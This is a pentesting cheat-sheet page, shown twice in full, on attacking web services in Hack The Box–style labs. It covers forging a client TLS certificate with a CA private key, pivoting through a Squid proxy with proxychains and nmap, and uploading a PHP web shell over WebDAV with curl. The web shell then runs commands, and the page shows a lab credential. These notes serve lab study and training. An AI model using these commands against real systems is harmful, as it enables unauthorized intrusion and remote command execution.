HTTP/HTTPS

HyperText Transfer Protocol - Port 80/443

Last updated 2 months ago

HTTP/HTTPS

HyperText Transfer Protocol - Port 80/443

Generate a TLS Certificate

`With the CA private key already`

Verify Client Certificate Requirements:

openssl s_client -connect 10.10.10.131:443

Generate the client's private key:

openssl genrsa -out client.key 4096

Create a certificate signing request (CSR) , ensure the fields match the server's expectations:

openssl req -new -key client.key -out client.req

Sign the CSR with the CA’s private key to issue a client certificate :

openssl x509 -req -in client.req -CA lacasadepapel-htb.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer

Convert the private key and certificate into a PKCS#12 (.p12) format file for easy import:

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

Squid Proxy

`Port 3128`

The config file normally lives in /etc/squid/squid.conf
Relays on /usr/lib/squid/basic_ncsa_auth for authentication and the program stores the passwords in /etc/squid/passwords.
Check if you can reverse it to access the local network.
First add the address and port to the last line of your proxychains.conf file:

http 10.10.10.67 312

Then, just nmap the localhost:

proxychains nmap -n -sT 127.0.0.1

`Upstream Proxy Server`

On burp go to Settings > Network > Connections
Create a new rule with * for the Destination Host, set the target proxy as the Proxy Host/Port and set the credentials with basic Authentication type.
In order to fuzz the localhost, set a Proxy Listener, redirect to 127.0.0.1:80 and set 127.0.0.1:1234 as the interface.
Now add the interface to /etc/proxychains.conf.

WebDAV

Web Distributed Authoring and Versioning, an extension of the HTTP protocol that allows users to collaboratively edit and manage files stored on a remote server.

Extends HTTP methods like GET and POST with additional ones like PROPFIND, PROPPATCH, MKCOL, DELETE, COPY, MOVE, and LOCK.
Credentials can be found at webdav.passwd.
can be use for enumeration.

Upload files

curl --upload-file ./file.php --user <UserName>:<Password> http://10.10.10.67/webdav_test_inception/

Run commands from revshell

curl --data-urlencode 'cmd=id' http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/file.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enumeration

davtest.pl -url http://10.10.10.67/webdav_test_inception -auth <UserName>:<Password>

PreviousFTP NextSMB

Last updated 2 months ago

Generate a TLS Certificate

`With the CA private key already`

Verify Client Certificate Requirements:

openssl s_client -connect 10.10.10.131:443

Generate the client's private key:

openssl genrsa -out client.key 4096

Create a certificate signing request (CSR) , ensure the fields match the server's expectations:

openssl req -new -key client.key -out client.req

Sign the CSR with the CA’s private key to issue a client certificate :

openssl x509 -req -in client.req -CA lacasadepapel-htb.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer

Convert the private key and certificate into a PKCS#12 (.p12) format file for easy import:

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

Squid Proxy

`Port 3128`

The config file normally lives in /etc/squid/squid.conf
Relays on /usr/lib/squid/basic_ncsa_auth for authentication and the program stores the passwords in /etc/squid/passwords.
Check if you can reverse it to access the local network.
First add the address and port to the last line of your proxychains.conf file:

http 10.10.10.67 312

Then, just nmap the localhost:

proxychains nmap -n -sT 127.0.0.1

`Upstream Proxy Server`

On burp go to Settings > Network > Connections
Create a new rule with * for the Destination Host, set the target proxy as the Proxy Host/Port and set the credentials with basic Authentication type.
In order to fuzz the localhost, set a Proxy Listener, redirect to 127.0.0.1:80 and set 127.0.0.1:1234 as the interface.
Now add the interface to /etc/proxychains.conf.

WebDAV

Web Distributed Authoring and Versioning, an extension of the HTTP protocol that allows users to collaboratively edit and manage files stored on a remote server.

Extends HTTP methods like GET and POST with additional ones like PROPFIND, PROPPATCH, MKCOL, DELETE, COPY, MOVE, and LOCK.
Credentials can be found at webdav.passwd.
can be use for enumeration.

Upload files

curl --upload-file ./file.php --user <UserName>:<Password> http://10.10.10.67/webdav_test_inception/

Run commands from revshell

curl --data-urlencode 'cmd=id' http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/file.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enumeration

davtest.pl -url http://10.10.10.67/webdav_test_inception -auth <UserName>:<Password>